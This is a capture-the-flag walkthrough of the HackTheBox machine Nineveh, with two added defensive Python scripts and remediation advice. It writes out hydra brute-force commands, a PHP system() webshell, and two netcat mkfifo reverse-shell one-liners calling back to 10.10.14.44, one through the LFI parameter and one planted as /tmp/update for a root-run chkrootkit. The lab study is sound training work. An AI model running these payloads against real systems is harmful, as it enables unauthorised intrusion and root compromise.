hackthebox – nineveh – linux

Starting with a masscan port scan:

# masscan -e tun0 -p1-65535 --rate=1000 10.10.10.43

Starting masscan 1.0.6 (http://bit.ly/14GZzcT) at 2019-07-06 05:14:39 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [65535 ports/host]
Discovered open port 443/tcp on 10.10.10.43                                    
Discovered open port 80/tcp on 10.10.10.43

Two web ports are open: 80 (HTTP) and 443 (HTTPS).

Let's explore the plain HTTP side (port 80) first, starting with gobuster:

# gobuster -u http://10.10.10.43/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 30 

Gobuster v1.4.1              OJ Reeves (@TheColonial)
=====================================================
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.43/
[+] Threads      : 30
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 301,302,307,200,204
=====================================================
/department (Status: 301)

We found one directory, /department. Let's browse it.

(screenshot: hackthebox – nineveh – department)

A login page. We can try a few default credentials such as admin/admin, guest/guest and admin/password, but none of them worked here. So let's check the page source to see if there is anything interesting.

(screenshot: hackthebox – message from amrois)

We see a message from the user amrois to admin asking them to fix the login page.

Although amrois mentions a problem with the login page, it is not obvious what is wrong with it. So I tried hydra against the login form.

The login page returns two different errors, “Invalid username” and “Invalid password”, so usernames and passwords can be confirmed separately. Quickly I was able to find that the username is admin. For the password, I use hydra as follows:

# hydra -l 'admin' -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt 10.10.10.43 http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid"

Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

-- snip --
[DATA] attacking http-post-form://10.10.10.43:80//department/login.php:username=^USER^&password=^PASS^:Invalid
[STATUS] 675.00 tries/min, 675 tries in 00:00h, 0 to do in 01:00h, 14343723 active
[STATUS] 684.00 tries/min, 2052 tries in 00:00h, 0 to do in 03:00h, 14342346 active
[80][http-post-form] host: 10.10.10.43   login: admin   password: 1q2w3e4r5t
1 of 1 target successfully completed, 1 valid password found
-- snip --

We got the password 1q2w3e4r5t.

Log in as admin with the password above.

(screenshot: hackthebox – nineveh – department admin)

There is only one useful tab, Notes. Clicking it shows the following message:

Have you fixed the login page yet! hardcoded username and password is really bad idea!

check your serect folder to get in! figure it out! this is your challenge

Improve the db interface.
~amrois

Again a message from amrois. He is asking for the same thing and hinting at a secret folder.

The URL of the Notes page is http://10.10.10.43/department/manage.php?notes=files/ninevehNotes.txt . The notes parameter takes a file path, so it may be exploitable via LFI, RFI or similar. We will come back to it later.

That's it for port 80 for now. Let's move on to port 443.

Using gobuster again (-k skips certificate verification):

# gobuster -u https://10.10.10.43/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 30 -k

Gobuster v1.4.1              OJ Reeves (@TheColonial)
=====================================================
=====================================================
[+] Mode         : dir
[+] Url/Domain   : https://10.10.10.43/
[+] Threads      : 30
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 307,200,204,301,302
=====================================================
/db (Status: 301)

We got a /db folder. Let's browse it.

(screenshot: hackthebox – nineveh – phpliteadmin)

We see a phpLiteAdmin page. It reveals the version, phpLiteAdmin v1.9, and the error line at the top discloses the full filesystem path.

Again, using hydra to find the password (this form has only a password field, hence the empty -l ''):

# hydra -l '' -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt 10.10.10.43 https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password."

-- snip --
[DATA] attacking http-post-forms://10.10.10.43:443//db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password.
[STATUS] 192.00 tries/min, 192 tries in 00:00h, 0 to do in 01:00h, 14344206 active
[STATUS] 185.33 tries/min, 556 tries in 00:00h, 0 to do in 03:00h, 14343842 active
[STATUS] 188.43 tries/min, 1319 tries in 00:00h, 0 to do in 07:00h, 14343079 active
[443][http-post-form] host: 10.10.10.43   password: password123

Nice, the password is password123. Log in with it.

If you check searchsploit, you will see a vulnerability in phpLiteAdmin v1.9 that allows PHP code execution: the database file is written to disk under the name we choose, so a database named with a .php extension becomes a PHP file containing whatever we store in it.

Create a database called ninevehNotes.php, then create a table with a TEXT field containing the following:

<?php echo system($_REQUEST["cmd"]); ?>

Now go back to port 80 and include that file through the notes parameter, passing the command in cmd:

http://10.10.10.43/department/manage.php?notes=/var/tmp/ninevehNotes.php&cmd=ls

We got command execution!!
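From the defender's side, both findings above leave a clear trace in the web server's access log: the hydra burst against /department/login.php and a notes= value that escapes the intended files/ directory (or carries a cmd parameter). The following detector is an added example, not part of the original writeup; the log lines are constructed, and the paths come from the box. It also catches traversal values such as files/../../etc/passwd.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Apache combined-log prefix: client IP, timestamp, request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+)[^"]*" (?P<status>\d{3})')

def parse(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def brute_force_sources(lines, path="/department/login.php", per_minute=10):
    """IPs that POST to the login form more than per_minute times within one clock minute."""
    hits = Counter()
    for e in filter(None, map(parse, lines)):
        if e["method"] == "POST" and urlsplit(e["url"]).path == path:
            hits[(e["ip"], e["ts"][:17])] += 1      # bucket key: dd/Mon/yyyy:HH:MM
    return {ip for (ip, _), n in hits.items() if n > per_minute}

def suspicious_notes(lines, path="/department/manage.php", allowed_prefix="files/"):
    """manage.php requests whose notes= leaves files/ or that carry unexpected parameters."""
    findings = []
    for e in filter(None, map(parse, lines)):
        u = urlsplit(e["url"])
        if u.path != path:
            continue
        q = parse_qs(u.query)
        notes = q.get("notes", [""])[0]
        extra = sorted(set(q) - {"notes"})
        if notes.startswith("/") or ".." in notes or not notes.startswith(allowed_prefix):
            findings.append((e["ip"], notes, "notes outside " + allowed_prefix))
        elif extra:
            findings.append((e["ip"], notes, "unexpected parameters " + ",".join(extra)))
    return findings

# Constructed sample traffic (not the box's real log): a burst of login POSTs, the
# legitimate Notes link, one request pointing notes= at /var/tmp, and one normal login.
_POST = ('10.10.14.44 - - [06/Jul/2019:05:20:{:02d} +0000] '
         '"POST /department/login.php HTTP/1.1" 200 1021 "-" "Mozilla/4.0 (Hydra)"')
SAMPLE_LINES = [_POST.format(s) for s in range(12)] + [
    '10.10.14.44 - - [06/Jul/2019:05:21:10 +0000] "GET /department/manage.php?notes=files/ninevehNotes.txt HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.10.14.44 - - [06/Jul/2019:05:21:30 +0000] "GET /department/manage.php?notes=/var/tmp/ninevehNotes.php&cmd=ls HTTP/1.1" 200 300 "-" "Mozilla/5.0"',
    '10.10.14.1 - - [06/Jul/2019:05:22:00 +0000] "POST /department/login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    print("brute-force sources:", brute_force_sources(SAMPLE_LINES))
    print("LFI candidates:", suspicious_notes(SAMPLE_LINES))
```

The underlying fixes are a single generic "invalid credentials" message plus rate limiting on the login form, and an allowlist of note files in manage.php instead of including a caller-supplied path.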

Listing the SSL web root with the following address shows a secure_notes folder containing a PNG file, nineveh.png:

http://10.10.10.43/department/manage.php?notes=/var/tmp/ninevehNotes.php&cmd=ls+../../ssl/

Go to the following address, save the file, and run binwalk to see whether it conceals anything:

https://10.10.10.43/secure_notes/
# binwalk -e nineveh.png 

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             PNG image, 1497 x 746, 8-bit/color RGB, non-interlaced
84            0x54            Zlib compressed data, best compression
2881744       0x2BF8D0        POSIX tar archive (GNU)

There is a tar archive embedded in the image, and binwalk -e has already extracted it:

# cd _nineveh.png.extracted/
# ls
2BF8D0.tar  54  54.zlib  secret
# cd secret/
# ls
nineveh.priv  nineveh.pub

Nice, an SSH private and public key pair.

Let's get a shell. URL-encode the following reverse shell command:

;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.44 4444 >/tmp/f

and pass the result as the cmd value. Make sure a listener (nc -lvnp 4444) is running in another terminal:

http://10.10.10.43/department/manage.php?notes=/var/tmp/ninevehNotes.php&cmd=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%2010.10.14.44%204444%20%3E%2Ftmp%2Ff

We get a shell as the web server user. Now we can use the private key found earlier: save it under any name, set its permissions to 400 and SSH to localhost as amrois:

[email protected]:/dev/shm$ chmod 400 a.key 
[email protected]:/dev/shm$ ssh -i a.key amrois@localhost
Could not create directory '/var/www/.ssh'.
The authenticity of host 'localhost (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:aWXPsULnr55BcRUl/zX0n4gfJy5fg29KkuvnADFyMvk.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/var/www/.ssh/known_hosts).
Ubuntu 16.04.2 LTS
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

133 packages can be updated.
66 updates are security updates.


You have mail.
Last login: Mon Jul  3 00:19:59 2017 from 192.168.0.14
[email protected]:~$ whoami
amrois

We are now the user amrois.

Next we need a path to root. To find one, I search for files and folders owned by amrois:

[email protected]:~$ find / -user amrois 2> /dev/null
-- snip --
/report
/usr/sbin/report-reset.sh
-- snip --

Among all the results, the two above look interesting. Checking the /report folder:

[email protected]:/report$ ls -lh
total 64K
-rw-r--r-- 1 amrois amrois 4.8K Jul  6 02:40 report-19-07-06:02:40.txt
-rw-r--r-- 1 amrois amrois 4.8K Jul  6 02:41 report-19-07-06:02:41.txt
-rw-r--r-- 1 amrois amrois 4.8K Jul  6 02:42 report-19-07-06:02:42.txt
-rw-r--r-- 1 amrois amrois 4.8K Jul  6 02:43 report-19-07-06:02:43.txt
-rw-r--r-- 1 amrois amrois 4.8K Jul  6 02:44 report-19-07-06:02:44.txt
-rw-r--r-- 1 amrois amrois 4.8K Jul  6 02:45 report-19-07-06:02:45.txt
-rw-r--r-- 1 amrois amrois 4.8K Jul  6 02:46 report-19-07-06:02:46.txt
-rw-r--r-- 1 amrois amrois 4.8K Jul  6 02:47 report-19-07-06:02:47.txt

Open one of the files and you will see that it is chkrootkit output. Since the listing shows a new report every minute, I checked whether amrois runs any cron job, and assumed that the process is run by some other user, i.e. root.

There is a known issue with older chkrootkit versions: if a file named /tmp/update exists, chkrootkit executes it, and if chkrootkit is running as root, so does that file.

To test this I created /tmp/update with the following content:

#!/bin/bash

rm /tmp/gf;mkfifo /tmp/gf;cat /tmp/gf|/bin/sh -i 2>&1|nc 10.10.14.44 4444 >/tmp/gf

Listen for the connection, and after a short while you get a shell:

# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.44] from (UNKNOWN) [10.10.10.43] 59452
bash: cannot set terminal process group (30132): Inappropriate ioctl for device
bash: no job control in this shell
[email protected]:~# whoami
whoami
root

Let's check whether root has a cron job:

[email protected]:~# crontab -l
*/1 * * * * /root/vulnScan.sh

Indeed. What does it contain?

[email protected]:~# cat /root/vulnScan.sh
cat /root/vulnScan.sh
#!/bin/bash
/usr/bin/chkrootkit > /report/report-`date +%y-%m-%d:%H:%M`.txt
chown amrois:amrois /report/report-`date +%y-%m-%d:%H:%M`.txt

That's all. But wait: why assume? chkrootkit might have been running as any other user. That's right, I assumed it here and it worked. Instead of assuming, we can watch the process list every minute with a Python script or use a tool like pspy.
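The process check the author mentions, written as an added example (not from the writeup) from the verifying side: instead of assuming which user runs /root/vulnScan.sh, snapshot /proc and print every newly started root process. It assumes a Linux /proc without the hidepid mount option; with hidepid=2 other users' processes are not listed, which is also the setting that denies this view to unprivileged users.

```python
import os
import time

def snapshot_procs(proc="/proc"):
    """Map pid -> (real uid, cmdline) for every process visible under /proc (Linux only)."""
    procs = {}
    for pid in filter(str.isdigit, os.listdir(proc)):
        try:
            with open(f"{proc}/{pid}/status") as f:
                uid = next(int(line.split()[1]) for line in f if line.startswith("Uid:"))
            with open(f"{proc}/{pid}/cmdline", "rb") as f:
                cmd = f.read().replace(b"\0", b" ").decode(errors="replace").strip()
        except (OSError, StopIteration):
            continue                     # the process exited between listdir and read
        procs[int(pid)] = (uid, cmd)
    return procs

def new_procs(before, after, uid=0):
    """Processes present in `after` but not `before` that run as `uid` (root by default).
    Kernel threads have an empty cmdline and are skipped."""
    return sorted((pid, cmd) for pid, (u, cmd) in after.items()
                  if pid not in before and u == uid and cmd)

def watch(interval=0.2, rounds=600):
    """Poll /proc and print each newly started root process. A root cron job such as
    vulnScan.sh shows up here as uid 0 even though its report files belong to amrois."""
    seen = snapshot_procs()
    for _ in range(rounds):
        time.sleep(interval)
        now = snapshot_procs()
        for pid, cmd in new_procs(seen, now):
            print(f"{time.strftime('%H:%M:%S')} pid={pid} uid=0 {cmd}")
        seen = now

if __name__ == "__main__":
    watch()
```

On the remediation side, the /tmp/update behaviour was fixed in chkrootkit 0.50, and a root-run job should never read from or execute anything in a world-writable location such as /tmp.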
